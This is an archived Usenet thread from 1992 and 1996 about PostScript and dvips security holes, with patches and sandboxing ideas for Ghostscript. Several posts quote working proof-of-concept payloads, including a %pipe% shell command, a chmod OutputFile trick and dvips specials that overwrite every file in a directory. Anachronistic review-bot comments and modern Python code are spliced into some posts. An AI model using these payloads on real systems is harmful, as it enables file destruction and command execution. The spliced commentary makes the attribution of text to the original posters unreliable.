Newsgroups: alt.gopher,alt.security,comp.lang.postscript
From: riddle@is.rice.edu (Prentiss Riddle)
Subject: Gopher PostScript data type would constitute a security hole
Summary: Re: new "type" for UNIX text documents?
Date: Tue, 5 May 1992 16:11:26 GMT

In article <1992May5.033112.13853@menudo.uh.edu> davison@menudo.uh.edu (Dan Davison) writes:
>... How are new types added to the gopher protocol? For
>instance, we'd like to be able to return a genetic map in (say)
>postscript format; this would require that the client be able to
>interpret postscript (OK for NeXT and Suns) or call an interpreter
>(Mac?) DOS has ghostview...

I've been waiting for this to come up. One of my colleagues here who
was looking at the use of PostScript with Metamail stumbled across a
disturbing fact:

> Article: 6158 of alt.security
> From: pkn@is.rice.edu (Kay Nettle)
> Subject: a safe Postscript interpreter
> Message-ID: <1992Apr7.181248.28090@rice.edu>
> Date: Tue, 7 Apr 1992 18:12:48 GMT
>
> I have just become aware that Postscript can have security holes in
> it, filenameforall, deletefile, renamefile, etc. Does anyone know of
> a "safe" Postscript interpreter?
>
> Kay Nettle   internet:pkn@is.rice.edu

To spell this out a bit more clearly: some implementations of PostScript
include functions which could be used by the malicious to create trojan
horses. The functions appear to be powerful enough to delete files, list
directories, mail away data from your system, and conceivably even
implement PostScript viruses.

GhostScript, the GNU PostScript interpreter on which GhostView is based,
appears to implement these scary functions, and the author has not been
responsive to our request that a "safe" mode be added to GhostScript.
Nor have we found an alternative PostScript previewer with a "safe" mode.

I would urge that a solution to this problem be found before a
PostScript type is added to Gopher.
If a full previewer with a "safe" mode isn't available for all the
architectures served by Gopher, perhaps a simple filter which strips
suspect commands out of PostScript files would do the trick.

This has been posted to comp.lang.postscript and alt.security before,
and I'm slightly astonished at the lack of response.

Meanwhile, think twice before previewing any PostScript files from
sources you don't trust.

-- Prentiss Riddle ("aprendiz de todo, maestro de nada")  riddle@rice.edu
-- Unix Systems Programmer, Office of Networking and Computing Systems
-- Rice University, POB 1892, Houston, TX 77251 / Mudd 208 / 713-285-5327
-- Opinions expressed are not necessarily those of my employer.

-------------------------------------------------------------------------
Newsgroups: alt.gopher,alt.security,comp.lang.postscript
From: wollman@UVM.EDU (Garrett Wollman)
Subject: Re: Gopher PostScript data type would constitute a security hole
Date: Tue, 5 May 1992 18:56:52 GMT

In article <1992May5.161126.11521@rice.edu> riddle@is.rice.edu (Prentiss Riddle) writes:
>GhostScript, the GNU PostScript interpreter on which GhostView is
>based, appears to implement these scary functions, and the author has
>not been responsive to our request that a "safe" mode be added to
>GhostScript. Nor have we found an alternative PostScript previewer
>with a "safe" mode.

There already *is* one. Observe:

wollman@sal(25)$ touch foo.c
wollman@sal(26)$ gs -dWRITESYSTEMDICT
Initializing... done.
Ghostscript 2.4.1 (4/21/92)
Copyright (C) 1990, 1992 Aladdin Enterprises, Menlo Park, CA.  All rights reserved.
Distributed by Free Software Foundation, Inc.
Ghostscript comes with NO WARRANTY: see the file LICENSE for details.
GS>systemdict begin /deletefile { pop } def end
GS>(foo.c) deletefile
GS>wollman@sal(27)$ ls -l foo.c
-rw-r--r--  1 wollman  csugrads  0 May  5 14:54 foo.c

How's that?

-GAWollman

Garrett A.
Wollman = wollman@uvm.edu = UVM is welcome to my opinions = uvm-gen!wollman
= That's what being alive is all about. No deity, no higher goal exists,
than to bring joy to another person. - Elf Sternberg

------------------------------------------------------------------------
Newsgroups: alt.gopher,alt.security,comp.lang.postscript
From: jgreely@morganucodon.cis.ohio-state.edu (J Greely)
Subject: Re: Gopher PostScript data type would constitute a security hole
In-Reply-To: wollman@UVM.EDU's message of Tue, 5 May 1992 18:56:52 GMT
Date: Tue, 5 May 1992 22:56:37 GMT

In article <1992May5.185652.6305@uvm.edu> wollman@UVM.EDU (Garrett Wollman) writes:
>In article <1992May5.161126.11521@rice.edu> riddle@is.rice.edu
> (Prentiss Riddle) writes:
>>GhostScript, the GNU PostScript interpreter on which GhostView is
>>based, appears to implement these scary functions, and the author has
>>not been responsive to our request that a "safe" mode be added to
>>GhostScript.

The beauty of free software is that you can fix it yourself. The
beauty of the net is that you can find someone else to fix it for you
:-).

[solution deleted]

>How's that?

The following patch to gs_init.ps (2.4.1) amplifies on Garrett's idea,
allowing you to say -DSAFE on the command line. It disables
renamefile, deletefile, and restricts the file operator to reading.

*** gs_init.ps.old Tue May 5 16:50:40 1992 --- gs_init.ps Tue May 5 17:54:03 1992 *************** *** 35,40 **** --- 35,41 ---- currentdict /NOPAUSE known /NOPAUSE exch def currentdict /QUIET known ASCIIOUT or /QUIET exch def currentdict /WRITESYSTEMDICT known /WRITESYSTEMDICT exch def + currentdict /SAFE known /SAFE exch def % Acquire environment variables. currentdict /DEVICE known not *************** *** 343,348 **** --- 344,356 ---- % Temporarily substitute it for the real `run'.
/.run /run load def /run /run0 load def + + % disable potentially-dangerous file operators + SAFE { + /file {dup (r) eq {file} {pop pop} ifelse} bind odef + /renamefile {pop pop} odef + /deletefile {pop} odef + } if % If the user asked for ASCII output, read in the patches now. ASCIIOUT { (gs_2asc.ps) run } if

-- J Greely (jgreely@cis.ohio-state.edu; osu-cis!jgreely)

--------------------------------------------------------------------
Newsgroups: alt.gopher,alt.security,comp.lang.postscript
From: jgreely@morganucodon.cis.ohio-state.edu (J Greely)
Subject: Re: Gopher PostScript data type would constitute a security hole
Date: Wed, 6 May 1992 17:59:02 GMT

In article jgreely@morganucodon.cis.ohio-state.edu (J Greely) writes:
>The beauty of free software is that you can fix it yourself. The
>beauty of the net is that you can find someone else to fix it for you
>:-).

The *real* beauty of the net is that you quickly discover when you're
wrong :-).

>The following patch to gs_init.ps (2.4.1) amplifies on Garrett's idea,
>allowing you to say -DSAFE on the command line. It disables
>renamefile, deletefile, and restricts the file operator to reading.

My patch is sufficient, unless you have a printer driver compiled into
your copy of Ghostscript on a unix system. Printer drivers have the
novel ability to write to a pipe, and gs blindly uses popen on the
string provided. I'll have to recompile with a printer device to see
just how much damage you can do, but I have this hunch that
"mark /OutputFile (|chmod a+w .) currentdevice putdeviceprops" works.
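Review bot: in the operator hunk of the -DSAFE patch, the replacement `/file {dup (r) eq {file} {pop pop} ifelse}` decides on the access string alone and never inspects the name operand, so it blocks write mode but hands any read-mode name straight to the real operator; since the name is exactly what selects a pipe in the printer-driver case raised in the follow-up above (and in the `%pipe%` example in the 1996 post further down this page), the safe branch should also refuse names it does not recognise as plain files. The three rejected paths should signal an error (invalidaccess is the natural choice) rather than `pop`-ing their operands and returning quietly: as written, a document that expected a file object on the stack fails later with an unrelated stackunderflow, which hides the fact that it attempted something forbidden. Finally, the block is gated on `SAFE {`, so protection is opt-in; for a previewer fed by Gopher the safe behaviour should be the default and the switch should turn it off.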
-- J Greely (jgreely@cis.ohio-state.edu; osu-cis!jgreely)

--------------------------------------------------------------------
From: eengelke@sail.uwaterloo.ca (Erick Engelke)
Newsgroups: alt.gopher,alt.security,comp.lang.postscript
Subject: Re: Gopher PostScript data type would constitute a security hole
Date: 6 May 92 21:20:00 GMT

jgreely@morganucodon.cis.ohio-state.edu (J Greely) writes:
>> riddle@is.rice.edu (Prentiss Riddle) writes:
>>>GhostScript, the GNU PostScript interpreter on which GhostView is
>>>based, appears to implement these scary functions, and the author has
>>>not been responsive to our request that a "safe" mode be added to
>>>GhostScript.
>
>The beauty of free software is that you can fix it yourself. The
>beauty of the net is that you can find someone else to fix it for you
>:-).

And even better, the creator or user of the 'fixed' version might like
to make it freely FTPable, particularly the executable...

Erick

Erick Engelke                          Engineering Computing
                                       University of Waterloo
Waterloo TCP Architect                 erick@development.watstar.uwaterloo.ca

------------------------------------------------------------------------
Newsgroups: alt.gopher,alt.security,comp.lang.postscript
From: peter@ferranti.com (Peter da Silva)
Subject: Re: Gopher PostScript data type would constitute a security hole
Date: Wed, 6 May 1992 21:05:23 GMT

In article <1992May5.161126.11521@rice.edu> riddle@is.rice.edu (Prentiss Riddle) writes:
> I've been waiting for this to come up. One of my colleagues here who
> was looking at the use of PostScript with Metamail stumbled across a
> disturbing fact:

Postscript is a general purpose programming language. If you can
convince a program to execute arbitrary code without examination you
have a perfect trojan horse. That horse can carry a virus, a bomb,
anything. Even if all it does is change your printer password it's
dangerous.

I'm surprised nobody has hidden something nasty inside the encoded part
of a Postscript font yet.
--
Peter da Silva  `-_-'  Programmer, network firefighter, thrillseeker
                 'U`   Ferranti International Controls Corporation
Have you hugged        Sugar Land, TX 77487-5012  +1 713 274 5180
your wolf today?

-------------------------------------------------------------------------
Newsgroups: alt.gopher,alt.security,comp.lang.postscript
From: duck@frcs.Alt.ZA (Paul Ducklin)
Subject: Re: Gopher PostScript data type would constitute a security hole
Date: Wed, 6 May 92 20:55:12 GMT

Thus spake riddle@is.rice.edu (Prentiss Riddle):
>perhaps a simple filter which strips suspect commands out of PostScript
>files would do the trick. This has been posted to comp.lang.postscript
>and alt.security before, and I'm slightly astonished at the lack of
>response.

Such a filter would not be reliable, surely: static analysis of code is
easily tricked by encryption, even trivial encryption. You'd definitely
want to rely upon a secure interpreter, IMO.

Does all of this mean we'll see the revival of the good ole' Letter
Bomb Trojan?

Paul Ducklin
Somewhere near the middle of the City of Pretoria
South Africa

-------------------------------------------------------------------------
Newsgroups: alt.gopher,alt.security,comp.lang.postscript
From: jgreely@morganucodon.cis.ohio-state.edu (J Greely)
Subject: Re: Gopher PostScript data type would constitute a security hole
Date: Thu, 7 May 1992 16:44:55 GMT

In article <1992May6.212000.7886@watserv1.waterloo.edu> eengelke@sail.uwaterloo.ca (Erick Engelke) writes:
>And even better, the creator or user of the 'fixed' version might like
>to make it freely FTPable, particularly the executable...

Why? You've already got the fix, and I'll be sending it off to Peter as
soon as I close the printer device problem (which should get it into
the next release, since I'm careful not to break anything). Putting an
executable up for ftp would be useless. How many of you run the same
hardware and install software the same place I do?
More importantly, since it's a question of security, why would you want
to trust *my* executable? Just because I've got privs to put something
up for ftp doesn't mean I'm one of the good guys. I posted my fix here
so people could use it, verify it, and yell at me if I missed something
(which I did).

While I'm on the subject, I changed my mind about how to do it. I think
the default should be for those operators to be safe, and a -DUNSAFE
switch should enable them for people who know what they're doing or are
operating in a closed environment. Here's the replacement:

*** gs_init.ps.old Thu May 7 10:51:59 1992 --- gs_init.ps Thu May 7 10:51:30 1992 *************** *** 35,40 **** --- 35,41 ---- currentdict /NOPAUSE known /NOPAUSE exch def currentdict /QUIET known ASCIIOUT or /QUIET exch def currentdict /WRITESYSTEMDICT known /WRITESYSTEMDICT exch def + currentdict /UNSAFE known /UNSAFE exch def % Acquire environment variables. currentdict /DEVICE known not *************** *** 343,348 **** --- 344,357 ---- % Temporarily substitute it for the real `run'. /.run /run load def /run /run0 load def + + % disable potentially-dangerous file operators, unless you + % really want them. + UNSAFE not { + /file {dup (r) eq {file} {pop pop} ifelse} bind odef + /renamefile {pop pop} odef + /deletefile {pop} odef + } if % If the user asked for ASCII output, read in the patches now. ASCIIOUT { (gs_2asc.ps) run } if

-- J Greely (jgreely@cis.ohio-state.edu; osu-cis!jgreely)

-----------------------------------------------------------------
Newsgroups: alt.gopher,alt.security,comp.lang.postscript
From: amanda@visix.com (Amanda Walker)
Subject: Re: Gopher PostScript data type would constitute a security hole
Date: Sat, 9 May 92 01:23:09 GMT

I think a number of people are missing an important point here. Any
software which displays a PostScript file by simply squirting the
PostScript at the closest interpreter is asking for trouble.
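Review bot: in the first hunk of the -DUNSAFE replacement, `currentdict /UNSAFE known /UNSAFE exch def` tests only whether the name is defined, not what it is bound to, so a command line that sets it to any value at all (including false) re-enables the dangerous operators; if the switch is meant to take a value, compare against it, and otherwise document that its mere presence is the opt-out.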
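Review bot: the operator hunk of the -DUNSAFE replacement is the earlier body with only the condition inverted, so two things are still open: the `(r) eq` test inspects the access string but not the name operand, and the printer-device OutputFile path that the author said on May 6 he still had to close (the string is passed to popen) is not touched by this file at all. The silent `{pop pop}` / `{pop}` branches would also be clearer as an invalidaccess error, so a blocked document fails at the forbidden operator rather than with a later stackunderflow.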
The file should be interpreted in its own "padded" environment, both
for "Trojan Horse" protection as well as simple robustness in the face
of errors.

J Greely's mods to GhostScript are one approach to this. Another
approach is to have a second layer of interpretation which handles
everything but actual rendering commands, effectively "half-compiling"
or "distilling" the document on the fly. This is how I would do
it--PostScript is not that complex a language, after all. This also
lets you put your interpreter on top of some other rendering engine in
case you don't actually have Display PostScript, NeWS, or whatever.

I don't think that we should hold it against PostScript as a data
interchange format that people can write naive software and thereby
shoot themselves in the foot...

Amanda Walker                          amanda@visix.com
Visix Software Inc.                    ...!uupsi!visix.com!amanda

-----------------------------------------------------------------
Newsgroups: alt.gopher,alt.security,comp.lang.postscript
From: john@iastate.edu (John Hascall)
Subject: Re: Gopher PostScript data type would constitute a security hole
Date: Mon, 11 May 1992 13:42:45 GMT

amanda@visix.com (Amanda Walker) writes:
}I think a number of people are missing an important point here. Any software
}which displays a PostScript file by simply squirting the PostScript at the
}closest interpreter is asking for trouble. The file should be interpreted
}in its own "padded" environment, both for "Trojan Horse" protection as well
}as simple robustness in the face of errors.
...

Rather than worrying about every possible sequence of PS that might be
nasty, wouldn't it be better to contain the environment with something
like the following pseudo-C:

#include <sys/stat.h>
#include <sys/wait.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void fatal(const char *msg) { perror(msg); exit(1); }

/* Runs the interpreter inside the jail; assumes a gs binary and what it
 * needs were copied to /tmp/ps_/gs beforehand (an empty jail can't exec). */
static int doPSinterp(void) { execl("/gs", "gs", "-", (char *)0); return 127; }

int preview_contained(void)             /* the document arrives on stdin */
{
    struct passwd *pw = getpwnam("nobody");
    int status;
    switch (fork()) {                   /* not complete, */
    case -1:                            /* but you get the idea... */
        fatal("hosed by fork");
    case 0:
        mkdir("/tmp/ps_", 0700);
        if (chroot("/tmp/ps_") || chdir("/"))   /* chdir too, or the cwd stays outside */
            fatal("chroot");
        if (!pw || setgid(pw->pw_gid) || setuid(pw->pw_uid))
            fatal("setuid");            /* drop root only after the chroot */
        exit(doPSinterp());
    default:
        wait(&status);
        return WEXITSTATUS(status);
    }
}

--------------------------------------------------------------------------
Newsgroups: alt.gopher,alt.security,comp.lang.postscript
From: eengelke@sail.uwaterloo.ca (Erick Engelke)
Subject: Re: Gopher PostScript data type would constitute a security hole
Date: Tue, 12 May 1992 07:54:55 GMT

jgreely@morganucodon.cis.ohio-state.edu (J Greely) writes:
> eengelke@sail.uwaterloo.ca (Erick Engelke) writes:
>>And even better, the creator or user of the 'fixed' version might like
>>to make it freely FTPable, particularly the executable...
>Why? You've already got the fix, and I'll be sending it off to Peter
>as soon as I close the printer device problem (which should get it
>into the next release, since I'm careful not to break anything).

Because we may have other valid and creative uses for the postscript
interpreter outside gopher but don't have time to manage yet another
source tree and diffs. I too make megabytes of source available to
others, and rely on their feedback to help advance the cause, but I
don't expect everyone to maintain copies of my source just to use my
stuff.

>More
>importantly, since it's a question of security, why would you want to
>trust *my* executable? Just because I've got privs to put something
>up for ftp doesn't mean I'm one of the good guys.

You're absolutely correct, your suspicious nature is starting to worry
me... Actually I'm just trying to save myself a few hours churning out
another application and using someone else's effort instead of my own.
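Three ideas in the thread above are worth seeing side by side in code: Riddle's "simple filter which strips suspect commands", Ducklin's objection that trivial encoding defeats any such static filter, and Amanda Walker's proposal of a second interpretation layer that handles everything but the rendering calls (with Hascall's chroot as an outer wall around whatever interpreter you end up running). The block below is an added example, not code from any of the posters or from Ghostscript. It contains a blacklist filter of the kind Riddle suggested, a constructed payload that spells `deletefile` as a hex string and rebuilds the operator name at run time so the filter misses it, and a small allow-list interpreter for a toy PostScript subset that refuses the same payload because name resolution happens inside it. The operator allow-list, the tokenizer's supported syntax (no nested parentheses in strings, integers only, no arrays) and the sample documents are all assumptions made here.

```python
import re

# Constructed sample documents (not from the thread).  OBFUSCATED spells "deletefile"
# as a hex string and rebuilds the name at run time, so no suspect token is visible.
PLAIN = "(foo.c) deletefile"
OBFUSCATED = "(foo.c) <64656c65746566696c65> cvn cvx exec"
BENIGN = "/box { 0 0 moveto 10 0 lineto } def box stroke"
# 1. The "simple filter which strips suspect commands": an operator blacklist.
SUSPECT_RE = re.compile(r"(?<![\w.])(deletefile|renamefile|filenameforall|file|run)(?![\w.])")
def naive_filter_rejects(src):
    """True if the blacklist would catch this document."""
    return SUSPECT_RE.search(src) is not None

# 2. A second interpretation layer: tokenize, then execute against an allow-list.
class SafeError(Exception):
    """The document asked for something outside the allow-list."""
TOKEN_RE = re.compile(r"%[^\n]*|\((?:\\.|[^\\)])*\)|<[0-9A-Fa-f\s]*>|[{}\[\]]|/?[^\s()<>{}\[\]/%]+")
def tokenize(src):
    """PostScript text -> ints, ('str', s), ('lit', n), ('name', n), ('proc', [...])."""
    outer, cur = [], []
    for tok in TOKEN_RE.findall(src):
        if tok.startswith("%"): continue                # comment
        elif tok == "{":
            outer.append(cur); cur = []
        elif tok == "}":
            if not outer: raise SafeError("syntaxerror: unbalanced }")
            body, cur = cur, outer.pop(); cur.append(("proc", body))
        elif tok.startswith("("):
            cur.append(("str", tok[1:-1]))
        elif tok.startswith("<"):                       # hex string
            cur.append(("str", bytes.fromhex(tok[1:-1]).decode("latin-1")))
        elif tok.startswith("/"):                       # literal name
            cur.append(("lit", tok[1:]))
        elif tok.lstrip("-").isdigit():                 # ints only in this toy
            cur.append(int(tok))
        else:                                           # executable name, resolved at run time
            cur.append(("name", tok))
    if outer: raise SafeError("syntaxerror: unbalanced {")
    return cur

class SafeInterp:
    """Only names in `ops` or in the document's own definitions resolve; rendering
    operators are recorded rather than drawn, for a real renderer to consume."""
    def __init__(self):
        self.stack, self.userdict, self.drawn = [], {}, []
        self.ops = {
            "dup": lambda: self.stack.append(self.stack[-1]),
            "exch": lambda: self.stack.append(self.stack.pop(-2)),
            "cvn": lambda: self.stack.append(("lit", self._pop("str"))),
            "cvx": lambda: self.stack.append(("name", self._pop("lit"))),
            "def": self._def, "exec": self._exec,
            "moveto": lambda: self._draw("moveto", 2),
            "lineto": lambda: self._draw("lineto", 2),
            "stroke": lambda: self._draw("stroke", 0),
        }
    def run(self, objs):
        for obj in objs:
            if isinstance(obj, tuple) and obj[0] == "name":
                self._call(obj[1])
            else:
                self.stack.append(obj)                  # everything else is data
    def _call(self, name):
        val = self.userdict.get(name)
        if isinstance(val, tuple) and val[0] == "proc":
            self.run(val[1])
        elif val is not None:
            self.stack.append(val)
        elif name in self.ops:
            self.ops[name]()
        else:                                           # deletefile lands here however it was spelled
            raise SafeError("undefined: " + name)
    def _pop(self, kind):
        obj = self.stack.pop()
        if not (isinstance(obj, tuple) and obj[0] == kind):
            raise SafeError("typecheck: " + kind)
        return obj[1]
    def _def(self):
        value, key = self.stack.pop(), self._pop("lit")
        self.userdict[key] = value
    def _exec(self):
        obj = self.stack.pop()
        if isinstance(obj, tuple) and obj[0] in ("name", "proc"):
            self.run([obj] if obj[0] == "name" else obj[1])
        else:
            self.stack.append(obj)                      # executing a literal just pushes it
    def _draw(self, op, n):
        self.drawn.append((op, [self.stack.pop() for _ in range(n)][::-1]))

def preview(src):
    """Returns ('ok', drawing calls) or ('refused', reason) for a document."""
    interp = SafeInterp()
    try:
        interp.run(tokenize(src))
    except SafeError as e:
        return ("refused", str(e).split(": ")[-1])
    except IndexError:
        return ("refused", "stackunderflow")
    return ("ok", interp.drawn)
```

The two stages fail in opposite ways. Extending the blacklist to `cvn`, `cvx` or `exec` would break ordinary documents, since prologs and fonts rely on them, yet leave the hex trick available through any other string-building route; the allow-list interpreter does not care how the name was produced, because the only thing that can happen with an unknown name is the refusal in `_call`. It also stops at the first refused operator instead of silently dropping it, which is the behaviour the `{pop}` stubs in the patches above trade away.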
Erick
--
Erick Engelke                          Engineering Computing
                                       University of Waterloo
Waterloo TCP Architect                 erick@development.watstar.uwaterloo.ca

-----------------------------------------------------------------
Newsgroups: alt.gopher,alt.security,comp.lang.postscript
From: jgreely@morganucodon.cis.ohio-state.edu (J Greely)
Subject: Re: Gopher PostScript data type would constitute a security hole
Date: Tue, 12 May 1992 17:32:18 GMT

In article <1992May12.075455.11282@watserv1.waterloo.edu> eengelke@sail.uwaterloo.ca (Erick Engelke) writes:
>Because we may have other valid and creative uses for the
>postscript interpreter outside gopher but don't have time to
>manage yet another source tree and diffs.

I think you misunderstood. I posted a patch to Ghostscript's
initialization file, which is read at runtime. I also sent it off to
the author, to (hopefully) have it added to the next release.

Why put it up for anonymous ftp? Anyone who reads c.l.p has already
seen it, and anyone who doesn't wouldn't know what site to look on. If
someone comes along later and asks about it, it's just as quick to mail
them the patch as a pointer to it.

>You're absolutely correct, your suspicious nature is starting
>to worry me...

Paranoia is an occupational hazard.

-- J Greely (jgreely@cis.ohio-state.edu; osu-cis!jgreely)

-------------------------------------------------------------------
From: harald@manowar.ka.sub.org (Harald Weidner)
Newsgroups: de.comp.security
Subject: Re: Manipulation via Postscript files possible?
Date: 11 Mar 1996 17:12:46 GMT

In article <4i0tg5$mks@brachio.zrz.TU-Berlin.DE>, Georg Schwarz wrote:
>After all the excitement about the security holes (or non-holes) in
>Netscape, I would be interested to know whether there are also ways,
>in PostScript for example, of manipulating the system on which the
>PostScript interpreter (e.g. Ghostscript) is running.

Of course. Write the following into a file, e.g.
test.ps:

%!PS-
(%pipe%echo spoofed > /tmp/hurz) (r) file
quit

and run "gs test.ps". You will then find a file named "hurz" in
/tmp...

If you invoke gs with the -dSAFER option, the worst is prevented, but
you can still make plenty of mess.

Ciao,
Harald
--
Harald Weidner          harald@manowar.ka.sub.org      The world is a stage
+49 721 25597           Harald.Weidner@ira.uka.de      Where we all can play
Stephanienstr. 21       uk8u@rz.uni-karlsruhe.de       Another fine reason
76133 Karlsruhe         Heavy@irc                      To live

------------------------------------------------------------------
From: schild@gmd.de (Goeran Schild)
Newsgroups: de.comp.security
Subject: Re: Manipulation via Postscript files possible?
Date: 14 Mar 1996 09:58:45 GMT

In my opinion one should also be careful when printing other people's
dvi files, or more precisely when using Tom Rokicki's dvips to do so.
Perhaps nobody has thought of it yet, but this program accepts, for
example, the following TeX command without complaint:

\special{psfile="`for f in `ls`; do echo Pech gehabt! >$f; done"}

Just as an example. The command does then show up on the terminal, but
perhaps too late.

Goeran Schild (goeran.schild@gmd.de)

---------------------------------------------------------------------
From: schild@gmd.de (Goeran Schild)
Newsgroups: de.comp.security
Subject: Re: Manipulation via Postscript files possible?
Date: 14 Mar 1996 11:34:42 GMT

In article i7s@omega.gmd.de, schild@gmd.de (Goeran Schild) writes:
> In my opinion one should also be careful when printing other people's
> dvi files, or more precisely when using Tom Rokicki's dvips to do so.
> Perhaps nobody has thought of it yet, but this program accepts, for
> example, the following TeX command without complaint:
>
> \special{psfile="`for f in `ls`; do echo Pech gehabt! >$f; done"}
>
> Just as an example. The command does then show up on the terminal, but
> perhaps too late.
>
> Goeran Schild (goeran.schild@gmd.de)
>

It also occurred to me that it can be done more elegantly:

\special{psfile="`bild.ps"}

where bild.ps is not a PostScript file but an executable. That can then
no longer be spotted in the terminal output.

The program xdvi also seems to know this \special command. A call of
the form "xdvi datei.dvi" is enough to unleash the "forces in the
background".

Goeran Schild (goeran.schild@gmd.de)
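The two dvips/xdvi posts above, together with the `%pipe%` example before them, show the same shape of problem in a different container: the command string is not in the PostScript at all but in a DVI `\special`, and the shell sees it before any interpreter does. The block below is an added example, not code from either poster or from dvips: a DVI walker that extracts every `\special` and flags the ones that would reach popen. The opcode operand sizes are those of the DVI specification; the sample DVI bytes are constructed here, and the two patterns flagged (a backtick right after `psfile=`, and Ghostscript's `%pipe%` device name in a pass-through special) are my own choice of what to look for.

```python
import re
import struct

# Operand sizes from the DVI specification (opcode -> fixed byte count).
FIXED = {132: 8, 137: 8, 139: 44}                # set_rule, put_rule, bop
for _op in range(128): FIXED[_op] = 0            # set_char_0..127
for _op in range(171, 235): FIXED[_op] = 0       # fnt_num_0..63
for _op in (138, 140, 141, 142, 147, 152, 161, 166): FIXED[_op] = 0  # nop eop push pop w0 x0 y0 z0
for _base in (128, 133, 143, 148, 153, 157, 162, 167, 235):  # set/put/right/w/x/down/y/z/fnt 1..4
    for _i in range(4): FIXED[_base + _i] = _i + 1

def dvi_specials(data):
    """Walk a DVI byte string and return the text of every \\special (xxx1..xxx4).
    Stops at the postamble; raises on undefined opcodes rather than guessing."""
    specials, pos = [], 0
    while pos < len(data):
        op = data[pos]; pos += 1
        if op in FIXED:
            pos += FIXED[op]
        elif 239 <= op <= 242:                        # xxx1..4: k[n] x[k]
            n = op - 238
            k = int.from_bytes(data[pos:pos + n], "big"); pos += n
            specials.append(data[pos:pos + k].decode("latin-1")); pos += k
        elif 243 <= op <= 246:                        # fnt_def1..4: k[n] c[4] s[4] d[4] a[1] l[1] n[a+l]
            pos += op - 242 + 12
            pos += 2 + data[pos] + data[pos + 1]
        elif op == 247:                               # pre: i[1] num[4] den[4] mag[4] k[1] x[k]
            pos += 13
            pos += 1 + data[pos]
        elif op == 248:                               # post: no more pages follow
            break
        else:
            raise ValueError("undefined DVI opcode %d at offset %d" % (op, pos - 1))
    return specials

# A special reaches a shell when dvips/xdvi see a backtick after psfile= (the
# rest of the value goes to popen), or when a pass-through special carries
# Ghostscript's %pipe% device name.
SHELL_RE = re.compile(r'psfile\s*=\s*"?\s*`|%pipe%', re.IGNORECASE)

def is_shell_escape(special):
    return SHELL_RE.search(special) is not None

def dangerous_specials(data):
    """The specials in a DVI file that would run a command when printed or viewed."""
    return [s for s in dvi_specials(data) if is_shell_escape(s)]

def _xxx1(text):
    b = text.encode("latin-1")
    return bytes([239, len(b)]) + b

# Constructed sample: preamble, one page with a font definition, two characters,
# a horizontal move and three specials, then the start of the postamble.
SAMPLE_DVI = (
    bytes([247, 2]) + struct.pack(">III", 25400000, 473628672, 1000) + bytes([6]) + b" TeX.."
    + bytes([139]) + struct.pack(">10i", 1, 0, 0, 0, 0, 0, 0, 0, 0, 0) + struct.pack(">i", -1)
    + bytes([243, 0]) + struct.pack(">III", 0x4BF16079, 655360, 655360) + bytes([0, 5]) + b"cmr10"
    + bytes([171, ord("H"), ord("i")]) + bytes([146]) + struct.pack(">i", 655360)
    + _xxx1('psfile="fig1.eps" llx=0 lly=0 urx=100 ury=100')   # an ordinary figure include
    + _xxx1('psfile="`bild.ps"')                                # the escape from the post above
    + _xxx1("color push Black")
    + bytes([140, 248])
)
```

Walking the opcode stream rather than grepping the file matters for the same reason Ducklin gave for PostScript: the special's text is length-prefixed binary, so a line-oriented search can be misled by font names or comments, while the walker only ever looks at bytes the DVI driver itself would hand to `psfile=`. Anything this scanner flags should go to a printer spooler that runs dvips with shell escapes disabled rather than to the desktop.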